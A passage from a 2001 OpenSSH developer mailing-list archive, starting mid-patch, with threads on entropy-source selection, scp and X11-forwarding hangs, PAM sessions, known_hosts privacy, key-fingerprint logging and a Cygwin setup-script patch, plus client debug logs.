log_level, SYSLOG_FACILITY_USER, 1); + fatal_add_cleanup(fatal_callback, NULL); + maxfd = fdlim_get(1); if (maxfd < 0) fatal("%s: fdlim_get: bad value", __progname); @@ -623,6 +777,9 @@ fdcon = xmalloc(maxfd * sizeof(con)); memset(fdcon, 0, maxfd * sizeof(con)); + init_rng(); + seed_rng(); + read_wait_size = howmany(maxfd, NFDBITS) * sizeof(fd_mask); read_wait = xmalloc(read_wait_size); memset(read_wait, 0, read_wait_size); @@ -630,12 +787,16 @@ do { while (ncon < MAXCON) { char *name; + int j; host = nexthost(argc, argv); if (host == NULL) break; name = strnnsep(&host, " \t\n"); - conalloc(name, *host ? host : name); + for (j = KT_RSA1; j <= KT_RSA; j *= 2) { + if (get_keytypes & j) + conalloc(name, *host ? host : name, j); + } } conloop(); } while (host); From mstone at cs.loyola.edu Mon Jun 11 12:41:14 2001 From: mstone at cs.loyola.edu (Michael Stone) Date: Sun, 10 Jun 2001 22:41:14 -0400 Subject: Patch to enable multiple possible sources of entropy In-Reply-To: ; from mouring@etoh.eviladmin.org on Sun, Jun 10, 2001 at 12:49:18PM -0500 References: <20010607125014.A15157@lucent.com> Message-ID: <20010610224114.C15731@justice.loyola.edu> On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote: > Hmm.. my only complaints about the patch is that seed_rng and init_rng are > pretty unreadable due to #ifdef/#end, and that I don't know if I like the > idea of ssh/sshd stepping down in entropy quality on a whim. Which is > what this patch would do if for some odd reason prngd is offline at > startup of sshd/ssh. What if there were some kind of warning message? We've already seen the obnoxious key-is-1023 message, what's one more? Obviously the entropy requirement depends on the application, but there are a lot of machines where I'm far more concerned about not getting in at all (because prngd is busted) than I am about bad entropy in that case. It's no worse than if prngd weren't being used at all, and might make it easier to accept prngd. -- Mike Stone From dwd at bell-labs.com Tue Jun 12 00:19:47 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 11 Jun 2001 09:19:47 -0500 Subject: Patch to enable multiple possible sources of entropy In-Reply-To: <20010610224114.C15731@justice.loyola.edu>; from mstone@cs.loyola.edu on Sun, Jun 10, 2001 at 10:41:14PM -0400 References: <20010607125014.A15157@lucent.com> <20010610224114.C15731@justice.loyola.edu> Message-ID: <20010611091947.A4269@lucent.com> On Sun, Jun 10, 2001 at 10:41:14PM -0400, Michael Stone wrote: > On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote: > > Hmm.. my only complaints about the patch is that seed_rng and init_rng are > > pretty unreadable due to #ifdef/#end I could make it a lot more readable by having it always do access() to probe for RANDOM_POOOL and PRNGD_SOCKET even if one of them is the only choice. I initially elected to trade off exact compatibility for readability, but I'd be happy to change it. I've included the more readable init_rng() below for you to take a look at. The difference is that even if only one of RANDOM_POOL or PRNGD_SOCKET is compiled in, if it isn't there the error message will be the more generic Couldn't find source for random number generator seed rather than a message about the problem accessing the specific source. I put in some debug level 2 messages to help debugging that case (those are good even if you choose to keep the extra ifdefs), and I slightly improved the fatal error message. Also, the ifdefs for PRNGD_SOCKET and USE_BUILTIN_ENTROPY do not really need to be in the else case of PRNGD_PORT because configure enforces that already, but I think it's more understandable this way. > > and that I don't know if I like the > > idea of ssh/sshd stepping down in entropy quality on a whim. Which is > > what this patch would do if for some odd reason prngd is offline at > > startup of sshd/ssh. > > What if there were some kind of warning message? We've already seen the > obnoxious key-is-1023 message, what's one more? I don't mind a debug message but I really would not want a warning message because that's going to be the normal case on a lot of my systems. My answer is that most likely even if prngd is offline, the PRNGD_SOCKET will still exist even though there's no process listening on the other side. In that case, ssh will go ahead into the prngd_get_random_bytes case but get a Connection Refused error (this happened during my testing). Another idea would be to improve the fatal error message by saving some information when the access() calls fail rather than just printing debug messages. For example, there could be a variable that points to the error message to use if it gets to the fatal condition at the end. Do you like that better? I don't think that complication is necessary. > Obviously the entropy > requirement depends on the application, but there are a lot of machines > where I'm far more concerned about not getting in at all (because prngd > is busted) than I am about bad entropy in that case. It's no worse than > if prngd weren't being used at all, and might make it easier to accept > prngd. Good point. - Dave Dykstra ------ more readable init_rng() follows ------------------------ void init_rng(void) { check_openssl_version(); #ifdef RANDOM_POOL if (access(RANDOM_POOL, F_OK) == 0) { seed_source = POOL_SOURCE; return; } else { debug2("Random pool %s does not exist", RANDOM_POOL); } #endif /* RANDOM_POOL */ /* it's not trivial to probe for an open port so just make it * take priority over the other sources if it is defined */ #ifdef PRNGD_PORT seed_source = PRNGD_SOURCE; #else #ifdef PRNGD_SOCKET if (access(PRNGD_SOCKET, F_OK) == 0) { seed_source = PRNGD_SOURCE; return; } else { debug2("Entropy socket %s does not exist", PRNGD_SOCKET); } #endif /* PRNGD_SOCKET */ #ifdef USE_BUILTIN_ENTROPY seed_source = BUILTIN_SOURCE; prng_init_rng(); #endif #endif /* PRNGD_PORT */ if (seed_source == 0) fatal("Couldn't find entropy source for random number generator"); } From dveeravalli at telica.com Tue Jun 12 01:07:51 2001 From: dveeravalli at telica.com (Deepa Nemmili Veeravalli) Date: Mon, 11 Jun 2001 11:07:51 -0400 Subject: scp error ! Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> I get the following error when trying to execute scp -v dveerava at keg:perl5.tar.gz root at boris:scptest error: .... Executing: program /usr/bin/ssh host boris, user root, command scp -v -t scptest You have no controlling tty. Cannot read passphrase. .... Can someone help me... Txs,Deepa. From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 12 01:22:58 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 11 Jun 2001 17:22:58 +0200 Subject: scp error ! In-Reply-To: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench>; from dveeravalli@telica.com on Mon, Jun 11, 2001 at 11:07:51AM -0400 References: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> Message-ID: <20010611172258.A18735@faui02.informatik.uni-erlangen.de> 3-way copy only works if pubkey or hostbased authentication is allowed from 'keg' to 'boris'. -m On Mon, Jun 11, 2001 at 11:07:51AM -0400, Deepa Nemmili Veeravalli wrote: > I get the following error when trying to execute > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > error: > .... > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > scptest > You have no controlling tty. Cannot read passphrase. > .... > > > Can someone help me... > > Txs,Deepa. From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 12 01:38:01 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 11 Jun 2001 17:38:01 +0200 Subject: Hanging SSH1 client (fwd) Message-ID: <20010611173801.A20893@faui02.informatik.uni-erlangen.de> installing openssh on irix is hard? -------------- next part -------------- An embedded message was scrubbed... From: Miguel Jardine Subject: Re: Hanging SSH1 client Date: Mon, 11 Jun 2001 11:09:38 -0700 Size: 4832 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010611/c665c85d/attachment.mht From pekkas at netcore.fi Tue Jun 12 03:35:36 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 11 Jun 2001 20:35:36 +0300 (EEST) Subject: Hanging SSH1 client (fwd) In-Reply-To: <20010611173801.A20893@faui02.informatik.uni-erlangen.de> Message-ID: On Mon, 11 Jun 2001, Markus Friedl wrote: > installing openssh on irix is hard? Not in itself, but as Irix doesn't have stuff like new zlib, tcp_wrappers, openssl, /dev/*random etc. there by default, and installing the prerequirements can be a bit troublesome (and ssh.com ssh includes these in itself). -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From wendyp at cray.com Tue Jun 12 05:04:46 2001 From: wendyp at cray.com (Wendy Palm) Date: Mon, 11 Jun 2001 14:04:46 -0500 Subject: Defect: OpenSSH hangs on logout References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org> <3B20D131.5C6BFDA@mail.microcenter.com> Message-ID: <3B25164E.A6460C92@cray.com> Aaron Bush wrote: > > > The real danger that i have come across is when doing a scp a defunct > process will show up after the copy is complete. > Basically you end up with a scp that never returns which is very bad. > > -ab that's the problem i'm having now. did you determine that signals were your problem? -- wendy palm Cray OS Sustaining Engineering, Cray Inc. wendyp at cray.com, 651-605-9154 From abush at microcenter.com Tue Jun 12 05:32:08 2001 From: abush at microcenter.com (Aaron Bush) Date: Mon, 11 Jun 2001 15:32:08 -0400 Subject: Defect: OpenSSH hangs on logout References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org> <3B20D131.5C6BFDA@mail.microcenter.com> <3B25164E.A6460C92@cray.com> Message-ID: <3B251CB8.C455C387@mail.microcenter.com> Wendy Palm wrote: > > Aaron Bush wrote: > > > > > > The real danger that i have come across is when doing a scp a defunct > > process will show up after the copy is complete. > > Basically you end up with a scp that never returns which is very bad. > > > > -ab > > that's the problem i'm having now. did you determine that signals were > your problem? > > -- > wendy palm > Cray OS Sustaining Engineering, Cray Inc. > wendyp at cray.com, 651-605-9154 I have replaced all of my HPUX sshd's with versions that do not SA_RESTART and have not had the problem again. However, the problem with a hung scp was _very_ intermittent and would sometimes take several days to appear. Whereas the interactive ssh sessions always required an extra keystroke to close the connection and now since the removal of SA_RESTART that problem has gone away 100%. If i have a scp process that hangs again with the new sshd i will update you. Thanks, -ab From mouring at etoh.eviladmin.org Tue Jun 12 09:11:44 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Mon, 11 Jun 2001 18:11:44 -0500 (CDT) Subject: scp error ! In-Reply-To: <7AC90049E901D511A8CA009027289AEA8EBDB4@wench> Message-ID: That is a known issue. It's currently not supported. - Ben On Mon, 11 Jun 2001, Deepa Nemmili Veeravalli wrote: > I get the following error when trying to execute > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > error: > .... > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > scptest > You have no controlling tty. Cannot read passphrase. > .... > > > Can someone help me... > > Txs,Deepa. > From djm at mindrot.org Tue Jun 12 11:12:55 2001 From: djm at mindrot.org (Damien Miller) Date: Tue, 12 Jun 2001 11:12:55 +1000 (EST) Subject: scp error ! In-Reply-To: Message-ID: On Mon, 11 Jun 2001 mouring at etoh.eviladmin.org wrote: To clarify: you need to be able to authenticate yourself to 'boris' from 'keg' without a passhprase (e.g. use pubkey auth and agent forwarding). -d > That is a known issue. It's currently not supported. > > - Ben > > On Mon, 11 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > I get the following error when trying to execute > > > > scp -v dveerava at keg:perl5.tar.gz root at boris:scptest > > > > error: > > .... > > Executing: program /usr/bin/ssh host boris, user root, command scp -v -t > > scptest > > You have no controlling tty. Cannot read passphrase. > > .... > > > > > > Can someone help me... > > > > Txs,Deepa. > > > -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From rachit at ensim.com Tue Jun 12 11:19:32 2001 From: rachit at ensim.com (Rachit Siamwalla) Date: Mon, 11 Jun 2001 18:19:32 -0700 Subject: yet another ssh hanging issue. Message-ID: <9AC41B8C4781464695BB013F106FCA31D2BE21@nasdaq.ms.ensim.com> This problem does not fit into the normal sleep 20 &; exit hanging problem. Basically, we use ssh as a secure RPC mechanism to install / update RPMs remotely. The problem is ssh "hangs" after installing an RPM "sometimes". And, no, that RPM does not start any daemons or hold onto any fds / ttys. Attached is various lsof / strace / ps / etc. information on the server after the "hanging" took place. We didn't attach the same for the client, although we did look, and the client seemed to be selecting on the "normal" fds, and waiting for the server to exit. (it was an ssh myhost rpm -U command) We couldn't get -v / -d output because this problem happens relatively rarely. No zombie processes. One thing that confuses us is fd #5. It is a unix socket but doesn't seem to look like a connection to /dev/log. ssh doesn't seem to connect to any other unix socket except for /dev/log, but then releases the connection rightaway. We will attempt to reproduce it and narrow down the possible reasons and hopefully eventually get -v / -d output, but hope this email helps. Also if someone knows whether anything significant changed in 2.9 that would likely fix these issues, that would be cool. Otherwise I'd like to postpone upgrading to 2.9, because it is an extreme pain to upgrade everyone's machine to 2.9 remotely, especially if i'm not sure if thats going to fix it (I'll never know until weeks afterward). Let me know if there are any questions. And thank you *very* much for a great package. It is making my job so much easier. ----------------- Environment info. Client: generic openssh 2.5.2p2 compiled without patches and statically linked to OpenSSL. Linux i386 Server: redhat 7.1 default openssh 2.5.2p2-5. Linux i386 Only configuration changes on server: Protocol 2 (only) BatchMode yes Port 19635 (some random other port) ------------------ <> -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshdata2.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010611/796478c0/attachment.txt From abartlet at pcug.org.au Tue Jun 12 15:29:44 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Tue, 12 Jun 2001 15:29:44 +1000 Subject: [PATCH] Run PAM sessions for all logins, not just ptys Message-ID: <3B25A8C8.501A3C0D@bartlett.house> This patch restores the behaviour of previous releases of OpenSSH and does a PAM session check for every login/logout, not just logins requesting a PTY. Mildly tested under RedHat 6.2. Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au -------------- next part -------------- diff -ur openssh-2.9p1old/session.c openssh-2.9p1/session.c --- openssh-2.9p1old/session.c Thu Apr 19 01:29:34 2001 +++ openssh-2.9p1/session.c Sun May 6 22:27:53 2001 @@ -496,6 +496,7 @@ session_proctitle(s); #if defined(USE_PAM) + do_pam_session(s->pw->pw_name, NULL); do_pam_setcred(1); #endif /* USE_PAM */ Only in openssh-2.9p1: session.c.old Only in openssh-2.9p1: session.c~ From mstone at cs.loyola.edu Wed Jun 13 02:16:43 2001 From: mstone at cs.loyola.edu (Michael Stone) Date: Tue, 12 Jun 2001 12:16:43 -0400 Subject: small patch to session.c Message-ID: <20010612121643.J15731@justice.loyola.edu> In the following code snippit from session.c: void session_close_by_pid(pid_t pid, int status) { Session *s = session_by_pid(pid); if (s == NULL) { debug("session_close_by_pid: no session for pid %d", s->pid); return; } if (s->chanid != -1) session_exit_message(s, status); session_close(s); } the reference to s->pid in the debug statement should probably just be pid. -- Mike Stone From qralston+ml.openssh-unix-dev at andrew.cmu.edu Wed Jun 13 05:55:25 2001 From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston) Date: Tue, 12 Jun 2001 15:55:25 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010609142739.A29124@folly> Message-ID: On Sat, 9 Jun 2001, Gert Doering wrote: > Now for known_hosts, I tend to disagree - I don't see any compelling > reason to exclude hosts from that list. An individual user's known_hosts file is implicitly prefixed with the following comment: # # Hi there, system cracker! This is my known_hosts file. This # file lists all the machines I connect to on a regular basis. # So, if you've broken into this machine and are reading this # file, do yourself a favor, and target these machines first. # Granted, if you're good, you'll figure this out anyway, but why # waste the effort when I've conveniently collected all this # information right here for you? An IDS might be on your tail # already, so you better get cracking (no pun intended). # Even worse is the case of maintaining the same known_hosts file on both sides of a firewall. If the DNS for the domain is configured to not return information about internal hosts to external requestors (which is often a reasonable thing to do), then by dragging information about external hosts outside the firewall, you've given a potential attacker information that might otherwise be quite difficult to gather. (This is particularly true if you use "CheckHostIP yes", which is OpenSSH's default unless explicitly overriden--if that's the case, not only have you revealed the names of internal hosts to a potential attacker, but you've revealed their IP addresses as well.) Gert continued: > So what we do is just "collect all host keys on one central machine, > and distribute the complete file from there". I wish I were in your shoes--that all of my access patterns involved one tidy centralized domain, and that I could just rely on a single global known_hosts file. But the world is not an ideal place, and my particular world is nowhere near that simple. My activities involve multiple machines across multiple domains. However, due to geographical locations and firewalls, it is *not* the case that I need to be able to login from every single machine to every other machine. The actual access patterns I require are quite small. Therefore, the contents of my known_hosts files is a minimal set for each machine. That way, if one of the boxes I use were to be cracked, I've reduced the information that the attacker would start with. The additional time this would buy might be the difference between intercepting and isolating the attack, and having the attacker successfully continue the attack through to other hosts. Gert continued: > With the keys, it's not that easy, as not everybody has access > everywhere. Replace "keys" with "known_hosts", and I'd wager your statement is still true for many people. (As I've illustrated, it's certainly still true for me.) On Sat, 9 Jun 2001, Markus Friedl wrote: > for known_hosts you have to scan your net and build a single file of > trusted hosts that can be distributed to all client machines. One doesn't "have to" do anything of the sort. I don't maintain my personal known_hosts file that way, as I've illustrated above. (Even if I *wanted* to do it that way, I couldn't; I have hosts from multiple different domains in my known_hosts file.) Markus continued: > you have to check this file for key changes. > checking for new files is much harder than > $ diff a b You're assuming that all users of OpenSSH have a single known_hosts file that is byte-for-byte identical to a single global collected host keys files for a single domain. This assumption is false. Let's say that I have 3 sets of collected host keys, each set containing hosts from a separate and unique domain. Let's call these sets {a}, {b}, and {c}. My personal known_hosts file is set {k}, where {k} is a subset of the union of {a}, {b}, and {c}, and the intersections of {k} with each of {a}, {b}, and {c} are all non-empty sets. In the above scnenario, you cannot check for key changes by using a diff command. If the host keys were stored as single files, you could easily check for key changes by using rsync with the --existing option. Or, using a hybrid solution, if OpenSSH's algorithm would be to look for multiple keys in each file, and to continue seaching until it either found a matching key or exhausted all files, you could create multiple files for each domain: ~/.ssh/known_hosts/foo.com ~/.ssh/known_hosts/bar.com ~/.ssh/known_hosts/podunk.edu Then, assuming you weren't maintaining subsets of each domain's global host keys files, you *could* actually use individual "diff" commands to check for changes... -- James Ralston, Information Technology Software Engineering Institute Carnegie Mellon University, Pittsburgh, PA, USA From rdawes at deloitte.co.za Wed Jun 13 16:48:10 2001 From: rdawes at deloitte.co.za (Dawes, Rogan (ZA - Johannesburg)) Date: Wed, 13 Jun 2001 08:48:10 +0200 Subject: Logging of RSA/DSA key used? Message-ID: <98A3855A9087D411952F00508B61BD4001EE2F21@ZAJNBNT006> Hi folks, I am sitting with a requirement to configure an account for shared use, with access via SSH, and RSA/DSA keys. What I would like to do, and I know it is not foolproof, is log the key presented in order to log on, for audit purposes. The intention is that each user has their own key pair, and the public keys are all stored on the server, as expected. When the key presented is accepted, simply log the key finger print, or the key itself to syslog. I have experimented a little with the available log levels, and saw an entry at VERBOSE level which is almost what I am looking for: Key found in /home/rdawes/.ssh/authorized_keys2, line 2 (or words to that effect) This level of logging is not recommended, as per the man page, and indeed, generates a lot of unnecessary info for my purposes. Would it be possible to add a log entry at INFO (preferably) or VERBOSE levels that would record a fingerprint of the public key matched? I understand that one needs to be careful of blindly logging user data to syslog, and don't really want the Key comment field anyway, but once one has verified that the key matches, I doubt that there can be any bad info in the key field itself, surely? Please Cc: me on any replies, as I am not subscribed to the list. Thanks Rogan -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe -- Tel: +27(11)806-6216 Fax: +27(11)806-5202 Cell: +27(82)784-9498 -- NOTE: This e-mail message and its attachments is subject to the disclaimers as published at: http://www.deloitte.co.za/disc.htm#emaildisc From vinschen at redhat.com Thu Jun 14 01:00:24 2001 From: vinschen at redhat.com (Corinna Vinschen) Date: Wed, 13 Jun 2001 17:00:24 +0200 Subject: [PATCH]: Add features to Cygwin's ssh-host-config script Message-ID: <20010613170024.N1144@cygbert.vinschen.de> Hi, I have added two features to the ssh-host-config script which is used in Cygwin installations to prepare the host based OpenSSH configuration. Now it cares for a /var/log/lastlog file if it's not already installed (Thanks to "Karl M" for that patch) and it now asks the user if s/he wants to install sshd as a NT service and, if so, installs it. Index: ssh-host-config =================================================================== RCS file: /cvs/openssh_cvs/contrib/cygwin/ssh-host-config,v retrieving revision 1.2 diff -u -p -r1.2 ssh-host-config --- ssh-host-config 2001/03/07 10:38:19 1.2 +++ ssh-host-config 2001/06/13 14:54:31 @@ -438,6 +438,48 @@ then fi fi +# Create /var/log and /var/log/lastlog if not already existing + +if [ -f /var/log ] +then + echo "Creating /var/log failed\!" +else + if [ ! -d /var/log ] + then + mkdir /var/log + fi + if [ -d /var/log/lastlog ] + then + echo "Creating /var/log/lastlog failed\!" + elif [ ! -f /var/log/lastlog ] + then + cat /dev/null > /var/log/lastlog + fi +fi + +# On NT ask if sshd should be installed as service +if [ $_nt -gt 0 ] +then + echo + echo "Do you want to install sshd as service?" + if request "(Say \"no\" if it's already installed as service)" + then + echo + echo "Which value should the environment variable CYGWIN have when" + echo "sshd starts? It's recommended to set at least \"ntsec\" to be" + echo "able to change user context without password." + echo -n "Default is \"binmode ntsec tty\". CYGWIN=" + read _cygwin + [ -z "${_cygwin}" ] && _cygwin="binmode ntsec tty" + if cygrunsrv -I sshd -d "CYGWIN sshd" -p /usr/sbin/sshd -a -D -e "CYGWIN=${_cygwin}" + then + chown system /etc/ssh* + echo + echo "The service has been installed under LocalSystem account." + fi + fi +fi + if [ "${old_install}" = "1" ] then echo Thanks, Corinna -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From june01 at stokes.ca Thu Jun 14 07:04:18 2001 From: june01 at stokes.ca (Allan Stokes) Date: Wed, 13 Jun 2001 14:04:18 -0700 Subject: user@host in AllowUsers Message-ID: I have a number of development machines behind my OpenBSD firewall which all provide a very permissive development account (and easy sudo). I don't want this account exposed on the internet side of the firewall, so I created a doorstep account with no perms and really long passwords to get anywhere useful. I looked through the SSH book and it gave me the impression that I could set up these rules: AllowUsers wiz@*.myhouse.nat AllowUsers doorstep@* But when I tested it was clear that OpenSSH 2.9 doesn't support this syntax. Then I searched this list and I found a post from June 4 by Andrew Tridgell supplying a patch to provide exactly this functionality. Actually I initially thought there might be an ipf-like syntax: AllowUsers wiz at xl0 The other option is to run different instances of sshd bound to different interfaces, with different config files. I'd rather not. Andrew's patch would do the job just fine. I hope it gets incorporated, especially since the SSH book implies that this kind of access control is possible. Allan From pekkas at netcore.fi Thu Jun 14 07:16:46 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Thu, 14 Jun 2001 00:16:46 +0300 (EEST) Subject: user@host in AllowUsers In-Reply-To: Message-ID: On Wed, 13 Jun 2001, Allan Stokes wrote: > Andrew's patch would do the job just fine. I hope it gets incorporated, > especially since the SSH book implies that this kind of access control is > possible. This has been a feature of SSH.COM's sshd for a long time, and this is what the book is probably referring to. Basically methods to control connecting hosts in sshd_config have been removed from OpenSSH because most of these features are provided by tcp_wrappers. Default tcp_wrappers can't handle the situation you're describing, or one where you want to use wildcards in all possible places in hostname definitions. There has been some debate on this in the past, but Markus et al haven't seen the need for this. Perhaps user at host control would be a "killer-application" in this regard? -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From acox at ia.primustel.com Thu Jun 14 07:30:06 2001 From: acox at ia.primustel.com (Aran Cox) Date: Wed, 13 Jun 2001 16:30:06 -0500 Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2 Message-ID: <20010613163006.A1374@benway.cv.telegroup.com> When I run this command: ssh -1 -v -n -l root njdb1b /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc An xterm appears on my screen, the contents of /etc scroll by and then ssh exits. When I invoke the same command with the -2 option, the xterm appears (and disappears) but ssh never exits. netstat says the (ssh) connection is still established but the xterm is no longer running. I'll include the output as attachments. Any idea as to what is going on? The client is RedHat 7.1 using RPMS from the openbsd.com ftp site. The server is SCO OpenServer 5.0.5 built with the SCO development environment. I configured with : export CCFLAGS='-L/usr/local/lib -I/usr/local/include' ./configure --sysconfdir=/etc/ssh --with-rsh=/usr/bin/rcmd --exec-prefix=/usr Thanks, Aran -------------- next part -------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/spin/.ssh/config debug1: Applying options for * debug1: Applying options for njdb* debug1: Reading configuration data /etc/ssh/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 debug1: Connecting to njdb1b [X.X.X.X] port 22. debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/spin/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug1: Host 'njdb1b' is known and matches the RSA1 host key. debug1: Found key in /home/spin/.ssh/known_hosts:3 debug1: Encryption type: blowfish debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'spin at benway' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug1: Requesting X11 forwarding with authentication spoofing. debug1: Requesting authentication agent forwarding. debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc debug1: Entering interactive session. debug1: Sending eof. debug1: Received X11 open request. debug1: fd 4 setting O_NONBLOCK debug1: fd 4 IS O_NONBLOCK debug1: channel 0: new [X11 connection from X.X.X.X port 1482] debug1: channel 0: rcvd ieof debug1: channel 0: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: send oclose debug1: channel 0: close_write debug1: channel 0: read<=0 rfd 4 len 0 debug1: channel 0: read failed debug1: channel 0: input open -> drain debug1: channel 0: close_read debug1: channel 0: input: no drain shortcut debug1: channel 0: ibuf empty debug1: channel 0: input drain -> wait_oclose debug1: channel 0: send ieof debug1: channel 0: rcvd oclose debug1: channel 0: input wait_oclose -> closed debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 X11 connection from X.X.X.X port 1482 (t4 r2 i8/0 o128/0 fd 4/4) Waiting for forwarded connections to terminate... The following connections are open: #2 X11 connection from X.X.X.X port 1482 (t4 r0 i4/0 o16/0 fd 8/8) debug1: Transferred: stdin 0, stdout 0, stderr 164 bytes in 1.7 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 96.3 debug1: Exit status 0 -------------- next part -------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/spin/.ssh/config debug1: Applying options for * debug1: Applying options for njdb* debug1: Reading configuration data /etc/ssh/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 debug1: Connecting to njdb1b [X.X.X.X] port 22. debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 1000/100 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/spin/.ssh/id_rsa type 1 debug1: identity file /home/spin/.ssh/id_dsa type -1 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: server->client blowfish-cbc hmac-md5 none debug1: kex: client->server blowfish-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 139/256 debug1: bits set: 1040/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host 'njdb1b' is known and matches the RSA host key. debug1: Found key in /home/spin/.ssh/known_hosts2:11 debug1: bits set: 1063/2049 debug1: ssh_rsa_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/spin/.ssh/id_rsa debug1: input_userauth_pk_ok: pkalg ssh-rsa blen 149 lastkey 0x80920e0 hint -1 debug1: ssh-userauth2 successful: method publickey debug1: fd 4 setting O_NONBLOCK debug1: channel 0: new [client-session] debug1: channel_new: 0 debug1: send channel open 0 debug1: Entering interactive session. debug1: client_init id 0 arg 0 debug1: Requesting X11 forwarding with authentication spoofing. debug1: Requesting authentication agent forwarding. debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc debug1: channel 0: open confirm rwindow 0 rmax 16384 debug1: client_input_channel_open: ctype x11 rchan 3 win 4096 max 2048 debug1: client_request_x11: request from X.X.X.X 1485 debug1: fd 7 setting O_NONBLOCK debug1: fd 7 IS O_NONBLOCK debug1: channel 1: new [x11] debug1: confirm x11 debug1: channel 0: read<=0 rfd 4 len 0 debug1: channel 0: read failed debug1: channel 0: input open -> drain debug1: channel 0: close_read debug1: channel 0: input: no drain shortcut debug1: channel 0: ibuf empty debug1: channel 0: input drain -> closed debug1: channel 0: send eof debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: channel 0: rcvd eof debug1: channel 0: output open -> drain debug1: channel 0: rcvd close debug1: channel 1: rcvd eof debug1: channel 1: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 client-session (t4 r0 i8/0 o128/0 fd 